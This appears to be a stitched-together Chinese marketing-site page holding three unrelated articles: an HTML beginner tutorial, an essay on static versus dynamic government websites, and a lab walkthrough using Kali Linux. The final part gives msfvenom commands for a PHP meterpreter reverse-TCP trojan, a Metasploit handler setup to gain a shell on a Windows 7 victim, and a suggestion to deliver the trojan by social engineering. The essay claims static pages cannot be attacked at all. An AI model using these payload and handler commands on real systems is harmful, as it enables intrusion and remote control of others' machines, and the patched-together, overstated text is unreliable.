整合營銷服務(wù)商
電腦端+手機端+微信端=數(shù)據(jù)同步管理
免費咨詢熱線:
電腦端+手機端+微信端=數(shù)據(jù)同步管理
免費咨詢熱線:
伙伴們,好幾天不見了,這一周菜鳥小白工作很忙,所以沒有每天更新學(xué)習(xí)內(nèi)容,但是菜鳥小白的學(xué)習(xí)是沒有停下來的,只是沒有時間來整理學(xué)習(xí)筆記了。現(xiàn)在就將菜鳥小白這兩天學(xué)習(xí)的HTML基礎(chǔ)和大家分享,其中還會拿一些標簽進行舉例,顯示效果。
HTML語言是一種標簽語言,它不需要編譯,可以直接由瀏覽器執(zhí)行。在標準網(wǎng)頁設(shè)計中HTML負責(zé)填充網(wǎng)頁的內(nèi)容,HTML編寫的超文本文檔(文件)稱之為HTML文檔(網(wǎng)頁),它包含了一些html元素,使用html或者htm為文件名后綴,能獨立于各種操作系統(tǒng)平臺,如Unix、Windows等
標準的html文檔是由標簽和要顯示在網(wǎng)頁上的內(nèi)容組成。HTML用于描述功能的符號成為“標簽”,如<html>、<body>、<table>等。HTML標簽規(guī)定HTML文檔的邏輯結(jié)構(gòu),并且控制文檔的顯示格式,然后由瀏覽器來負責(zé)解釋并顯示頁面。通過使用標簽可以區(qū)分文本文件的各個組成部分,對頁面上的文字、表格、圖片等多媒體數(shù)據(jù)所出現(xiàn)的位置、形式、順序及網(wǎng)頁間的超鏈接關(guān)系進行設(shè)定。
標簽都是封裝在一對尖括號“<……>”之中。標簽只改變網(wǎng)頁的顯示方式,本身不會顯示在窗口中。HTML文檔中最先出現(xiàn)的標簽是<html>標簽。<html>標簽是文檔標識符,它是成對出現(xiàn)的,首標簽<html>和尾標簽</html>分別位于文檔的最前面和最后面,明確地表示文檔是以超文本標識語言(HTML)編寫的。該標簽不帶任何屬性
<html>……</html>之間有如下標簽:
head是英文“頭”的意思。習(xí)慣上用戶把HTML文檔分為文檔頭和文檔主體兩部分。文檔主體部分就是在web瀏覽器窗口的用戶區(qū)內(nèi)看到的內(nèi)容,而文檔頭部分用來規(guī)定該文檔的標題(出現(xiàn)在web瀏覽器窗口的標題欄中)和文檔的一些屬性。<head>標簽對的作用就是控制文檔的頭部信息。中間可以使用<title>……</title>、<script>……</script>標簽對,在此標簽中間可以HTML文檔的標簽是可以嵌套的,即在一對標簽中可以嵌入另外一對子標簽,用來規(guī)定母標簽所含范圍的屬性或其中某一部分內(nèi)容,嵌套在<head>……</head>標簽對中使用的主要有<title>標簽
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
菜鳥小白的學(xué)習(xí)分享
</head>
</html>
保存為HTML文件后顯示如下:
<title>標簽是成對出現(xiàn)的,用以規(guī)定HTML文檔的標題。在<title>……</title>之間的內(nèi)容將顯示在web瀏覽器窗口的標題欄中。另外,<title>……</title>標簽對只能放在<head>……</head>標簽對之間,而且其內(nèi)部不能包含其它標簽。
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學(xué)習(xí)分享</title>
</head>
</html>
修改后顯示如下:
<body>標簽也是成對出現(xiàn)的。在<body>……</body>之間的內(nèi)容將顯示在web瀏覽器窗口的用戶區(qū)內(nèi),它是HTML文檔的主體部分。可以把HTML文檔的主體區(qū)域簡單地理解成標題以外的所有部分,該部分可以包含<table>、<font>、<img>、<div>等標簽。結(jié)束標簽</body>指明主體區(qū)域的結(jié)尾,在<body>中可以規(guī)定整個文檔的一些基本屬性:
我們驗證了前兩個屬性
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學(xué)習(xí)分享</title>
</head>
<body bgcolor="11ffff" text="000000">
測試內(nèi)容
?
</body>
</html>
顯示效果如下:
在html中有許多特殊字符需要處理,例如:“<”、">"這兩個符號本身是用來表示標簽的開始和結(jié)束的,是沒有辦法通過直接打出來的,必須輸入編碼表示法:“<”和“>”。
通常情況下html會自動截取多余的空格。不管你加多少個空格,都被看做一個空格。如果要顯示多個空格,可以使用 表示空格
我們看看實現(xiàn)代碼
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學(xué)習(xí)分享</title>
</head>
?
<body bgcolor="11ffff" text="000000">
<測試內(nèi)容> 空格在中間 看到了吧
?
</body>
</html>
顯示效果:
在瀏覽器中控制文本對象的顯示,包括段落、換行、水平線等標簽,下面介紹幾個常用的html格式標簽。所有的格式標簽全部都是在嵌套在<body>……</body>標簽對之間的
全稱paragraph。<p>……</p>標簽對用于創(chuàng)建一個段落,支持align屬性來設(shè)置對齊方式,語法如下:
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學(xué)習(xí)分享</title>
</head>
?
<body bgcolor="11ffff" text="000000">
<p align="center"><測試內(nèi)容> 空格在中間 看到了吧</p>
?
</body>
</html>
顯示效果:
在不另起一段的情況下將當(dāng)前文本強制換行,<br>標簽屬于單獨出現(xiàn)的標簽,禁止出現(xiàn)結(jié)束標簽。
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學(xué)習(xí)分享</title>
</head>
?
<body bgcolor="11ffff" text="000000">
<p align="center"><測試內(nèi)容></br> 空格在中間 看到了吧</p>
?
</body>
</html>
顯示效果:
可以完整保留設(shè)計者在源文件中所定義的格式,包含各種空格,縮進,以及其他特殊字符,全部都原封不動的展示在瀏覽器頁面上。
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學(xué)習(xí)分享</title>
</head>
?
<body bgcolor="11ffff" text="000000">
<p align="center"><測試內(nèi)容></br> 空格在中間 看到了吧</p>
<pre>
我是菜鳥小白
你們的好朋友
?
讓我們一起學(xué)習(xí)吧!!!
</pre>
?
</body>
</html>
顯示效果:
主要分為無序列表、排序列表、目錄列表、菜單列表和描述性列表五種類型
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學(xué)習(xí)分享</title>
</head>
?
<body bgcolor="11ffff" text="000000">
<ul>
<li>我是菜鳥小白</li>
<li>你們的好朋友</li>
?
<li> 讓我們一起學(xué)習(xí)吧!!!</li>
</ul>
?
</body>
</html>
效果如下:
?描述性列表:
<html lang="zh-cn">
<head>
<meta content="text/html;charset=utf-8">
<title>菜鳥小白的學(xué)習(xí)分享</title>
</head>
?
<body bgcolor="11ffff" text="000000">
<dl>
<dt>菜鳥小白測試表頭</dt>
<dd>我是菜鳥小白</dd>
<dd>你們的好朋友</dd>
<dd> 讓我們一起學(xué)習(xí)吧!!!</dd>
<dt>菜鳥小白測試表頭2</dt>
<dd>我是菜鳥小白</dd>
<dd>你們的好朋友</dd>
<dd> 讓我們一起學(xué)習(xí)吧!!!</dd>
</dl>
?
</body>
</html>
顯示效果如下:
?
好了,今天的內(nèi)容就到這了,我們明天繼續(xù)學(xué)習(xí)HTML基礎(chǔ)內(nèi)容,不見不散~
輯導(dǎo)語:我們可以發(fā)現(xiàn)很多政府網(wǎng)站基本都是選擇靜態(tài)發(fā)布的,這是因為靜態(tài)發(fā)布能夠更好的保證網(wǎng)站的速度以及安全性等等,政府網(wǎng)站這類對安全性要求較高的網(wǎng)站多會選擇靜態(tài)發(fā)布;本文作者分享了關(guān)于政府網(wǎng)站選擇靜態(tài)發(fā)布的原因,我們一起來了解一下。
今年過了年接手了政府網(wǎng)站建設(shè)相關(guān)的產(chǎn)品工作,發(fā)現(xiàn)和以往產(chǎn)品最大的不同是,政府網(wǎng)站建設(shè)用的是靜態(tài)發(fā)布,以前做的移動產(chǎn)品都是動態(tài)的。那么政府網(wǎng)站為什么一般都選擇靜態(tài)發(fā)布呢?今天就來總結(jié)分析下。
靜態(tài)與動態(tài)是相對來說的,靜態(tài)網(wǎng)頁就是我們常見的以.htm、.html、.shtml等后綴結(jié)尾的頁面。
通常靜態(tài)網(wǎng)頁的制作流程是:
第一步:發(fā)布信息到數(shù)據(jù)庫
第二步:選擇頁面的模板
第三步:程序讀取模板+數(shù)據(jù)庫信息=靜態(tài)頁面
第四步:發(fā)布索引頁面(如首頁、引導(dǎo)頁等)
靜態(tài)頁面的生成至少需要上述幾個步驟才能完成。
靜態(tài)網(wǎng)站設(shè)計所采用的的技術(shù)原理是一對一的形式,也就是說在這樣的網(wǎng)站上面,一個內(nèi)容對應(yīng)的就是一個頁面,對應(yīng)服務(wù)器上的一個文件;所以靜態(tài)網(wǎng)站可以簡單理解為純粹就是幾個制作好的頁面而已。
網(wǎng)頁在設(shè)計好并上傳到服務(wù)器后,就不能對網(wǎng)站的內(nèi)容進行修改了,除非把網(wǎng)站文件下載下來,用專業(yè)的網(wǎng)站制作軟件修改編輯好后再次上傳;所以在靜態(tài)頁面的制作中,模板是關(guān)鍵,因為一旦想要調(diào)整頁面,必須再次創(chuàng)建,而如果數(shù)據(jù)量大的話,那么這個更新時間將相當(dāng)可怕。
另外,靜態(tài)頁面不需要與數(shù)據(jù)庫通信,無論網(wǎng)站訪問者如何操作,都只是讓服務(wù)器把固有的數(shù)據(jù)傳送給請求者,沒有腳本計算和后臺數(shù)據(jù)庫讀取的過程。
最后補充一下,URL相對動態(tài)網(wǎng)站來說也比較清晰,如,product.html。
因為靜態(tài)網(wǎng)站沒有其他程序和數(shù)據(jù)讀取,因此靜態(tài)網(wǎng)站打開速度相對比較快。
動態(tài)網(wǎng)頁網(wǎng)址中動態(tài)參數(shù)太多,而且鏈接過長,而靜態(tài)網(wǎng)頁則相反,因此靜態(tài)網(wǎng)頁比動態(tài)網(wǎng)頁更受搜索引擎歡迎。
再加上靜態(tài)頁面打開速度快、網(wǎng)站URL標準化程度高、網(wǎng)站簡潔、網(wǎng)站用戶體驗度好,使得靜態(tài)網(wǎng)頁更容易被搜索引擎所收錄。
因為靜態(tài)頁面都是純html格式的文件,所以不管黑客使用什么樣的手段都無法直接對網(wǎng)站進行攻擊,所以在網(wǎng)站安全性方面,靜態(tài)頁面是做的最好、最安全的一種方式。
因為靜態(tài)頁面無法在調(diào)整后自動更新,不能直接對網(wǎng)站內(nèi)容進行修改,所以如果要調(diào)整頁面,必須再次創(chuàng)建,維護操作十分繁瑣。
雖然靜態(tài)頁面不需要對數(shù)據(jù)進行不斷讀取,但是在生產(chǎn)靜態(tài)頁面的時候,程序需要對服務(wù)器進行創(chuàng)建文件夾、創(chuàng)建html文件、刪除文件等操作,所以如果網(wǎng)站存在上萬篇文章,那么每生成一次靜態(tài)文件,就會對網(wǎng)站服務(wù)器帶來很大壓力,而且也無形地增加空間占用率。
靜態(tài)頁面由于受其特性影響,無法實現(xiàn)會員注冊、在線留言等功能,只能簡單地以信息展示為主。
動態(tài)網(wǎng)站是先從數(shù)據(jù)庫里面獲取數(shù)據(jù),然后再按一個格式顯示出來,也就是說只需要一個顯示頁面內(nèi)容的框架,就可以把成千上萬的網(wǎng)頁顯示出來了,所以動態(tài)網(wǎng)站對服務(wù)器空間要求很小。
動態(tài)網(wǎng)站內(nèi)容可以實時更新,而且與用戶交互性強,比如一些論壇、注冊、在線聊天頁面都是動態(tài)的。
另外,動態(tài)網(wǎng)站由于每次加載一個新的頁面,都需要與后臺數(shù)據(jù)庫通信,所以加載速度會稍慢一些。
在URL方面,動態(tài)網(wǎng)站URL可能會帶有參數(shù)。
動態(tài)網(wǎng)站的開發(fā)語言主要有:ASP、JSP、PHP、ASP.NET,早期最普遍的是ASP開發(fā)的網(wǎng)站,現(xiàn)在主流網(wǎng)站開發(fā)語言是PHP、ASP.NET。這些程序都要使用數(shù)據(jù)庫才能完成動態(tài)操作。數(shù)據(jù)庫常用的有:ACCESS、MYSQL、MSSQL、ORACLE等。
由于動態(tài)頁面可以通過網(wǎng)站程序直接調(diào)用大量數(shù)據(jù)直接展示到網(wǎng)站前臺,因此動態(tài)頁面對網(wǎng)站服務(wù)器產(chǎn)生的壓力相對較小。
但是由于動態(tài)頁面需要不斷的調(diào)用數(shù)據(jù)庫中的數(shù)據(jù),所以對數(shù)據(jù)庫的要求還是比較大的,而且頻繁的調(diào)用讀取會增加數(shù)據(jù)庫的負擔(dān),嚴重情況有可能會導(dǎo)致數(shù)據(jù)庫崩潰現(xiàn)象。
動態(tài)網(wǎng)站由于可以實時修改更新,因此維護方便,同時由于可以存儲大量數(shù)據(jù),所以在需要時可以立即查詢。
搜索引擎的算法受網(wǎng)站安全性、網(wǎng)站打開速度、網(wǎng)站URL對用戶的體驗度等影響,使得搜索引擎對動態(tài)頁面賦予的權(quán)重值和信任度相對較低。
由于動態(tài)頁面網(wǎng)站的URL參數(shù)和網(wǎng)站目錄結(jié)構(gòu)都是很明顯的暴露在瀏覽器上面的,所以很多黑客可以通過修改網(wǎng)站的URL參數(shù)從而獲得網(wǎng)站的shell權(quán)限,進入后臺拿到管理員賬號密碼,對網(wǎng)站進行非法操作,因此動態(tài)網(wǎng)站的安全性較低。
除此之外,因為動態(tài)網(wǎng)站會用到數(shù)據(jù)庫,所以對數(shù)據(jù)庫的安全和保密性要求較高,要專業(yè)技術(shù)人員提供維護才能保證網(wǎng)絡(luò)安全。
偽靜態(tài)本身其實就是動態(tài)網(wǎng)頁,只不過是被轉(zhuǎn)換重寫成了靜態(tài)網(wǎng)頁,此時通過瀏覽器訪問的地址和真的靜態(tài)頁面沒有區(qū)別。
當(dāng)考慮搜索引擎優(yōu)化SEO時,可以將動態(tài)頁面通過服務(wù)器處理成靜態(tài)頁面,比如論壇帖子頁面,都是經(jīng)過偽靜態(tài)處理成靜態(tài)頁面。
但是偽靜態(tài)不是真實地址,到底要顯示哪個頁面也就不能直接指定,而要由CPU來判斷,所以CPU占有量的上升是偽靜態(tài)最大的弊病。
總之,為了SEO,網(wǎng)站可以選擇偽靜態(tài),但是為了避免CPU超負荷,可以少量使用偽靜態(tài),甚至可以只在專門提供給SEO的Archiver中使用偽靜態(tài)。
當(dāng)然,現(xiàn)在也有越來越多的網(wǎng)站采用動靜結(jié)合的方式,因此可根據(jù)具體需求及實際情況來選擇不同的技術(shù)方案。
作者:王山而,喜歡讀書、喜歡研究用戶心理,坐標:北京。公眾號:小2在思考
本文由@王山而 原創(chuàng)發(fā)布于人人都是產(chǎn)品經(jīng)理,未經(jīng)許可,禁止許可。
題圖來自 unsplash,基于CCO協(xié)議
、背景介紹
1.安裝好 Win7的虛擬機一臺
2.整裝待發(fā)的小白一個。
3.安裝好的Kali Linux虛擬機一臺。
3.1 將受害者主機(Windows7)跟攻擊者主機(Kali Linux)的網(wǎng)絡(luò)模式全部設(shè)置為NAT模式,如下圖所示。
步驟:打開虛擬機的設(shè)置/選擇網(wǎng)絡(luò)適配器/選擇NAT模式。
3.2 查看實驗的兩臺主機的IP地址,如下圖所示。
命令:ifconfig
3.3 利用“msfvenom”木馬生成工具生成對應(yīng)的木馬文件,如下圖所示。
步驟1:msfvenom工具的參數(shù)介紹
-p, –payload < payload> 指定需要使用的payload(攻擊荷載)。也可以使用自定義payload,幾乎是支持全平臺的
-o, –out < path> 指定創(chuàng)建好的payload的存放位置。
-h, –help 查看幫助選項。
步驟2:利用msfvenom工具生成對應(yīng)的木馬文件,如下圖所示。
命令:msfvenom -p 指定需要使用的payload(攻擊荷載) lhost=攻擊者主機IP -f exe > 生成木馬文件的保存位置
例子:msfVenom -p php/meterpreter/reverse_tcp lhost=192.168.78.168 lport=4444 -r raw > /root/hack.php
步驟3:在已知的木馬文件保存路徑目錄下查找對應(yīng)的木馬文件是否已經(jīng)生成,如下圖所示,木馬文件已經(jīng)存在(這里使用圖形化文件管理系統(tǒng)來查看,你也可以利用ls命令查看對應(yīng)路徑下面是否已經(jīng)生成對應(yīng)的木馬文件)。
3.4 利用一定的社會工程學(xué)方法將生成的木馬文件發(fā)送到目標受害者主機,并且在受害者主機進行運行(對應(yīng)的社會工程學(xué)知識請持續(xù)關(guān)注本號,后續(xù)講解),如下圖所示。
3.5 安裝“phpstudy集成環(huán)境”,如下圖所示。
步驟1:打開“phpstudy”官網(wǎng)選擇與你電腦系統(tǒng)相對應(yīng)的軟件版本下載。
步驟2:安裝注意事項
1. 安裝路徑不能包含“中文”或者“空格”,否則會報錯(例如錯誤提示:Can't change dir to 'G:\x65b0\x5efa\x6587\)
2. 保證安裝路徑是純凈的,安裝路徑下不能有已安裝的V8版本,若重新安裝,請選擇其它路徑
步驟3:phpstudy官方使用教程,需者自取。
網(wǎng)址:https://www.php.cn/course/1066.html
3.6 安裝好對應(yīng)的軟件后,啟動phpstudy中的環(huán)境,如下圖所示。
步驟1:點擊相應(yīng)的環(huán)境旁邊的啟動按鈕啟動即可。
步驟2:進入apache服務(wù),如下圖所示。
3.7 將對應(yīng)的木馬文件上傳到apache服務(wù)的www目錄下,如下圖所示。
3.8 啟動Metasploit(msf)滲透框架,如下圖所示。
命令1:msfconsole
命令2:use exploit/multi/handler
命令3:set payload php/meterpreter/reverse_tcp
命令4:show options
命令5:set lhost 192.168.78.168
命令6:run(啟動攻擊模塊)
3.9 拿到目標主機服務(wù)器的shell,如下圖所示。
命令:shell進入shell頁面。
*請認真填寫需求信息,我們會在24小時內(nèi)與您取得聯(lián)系。
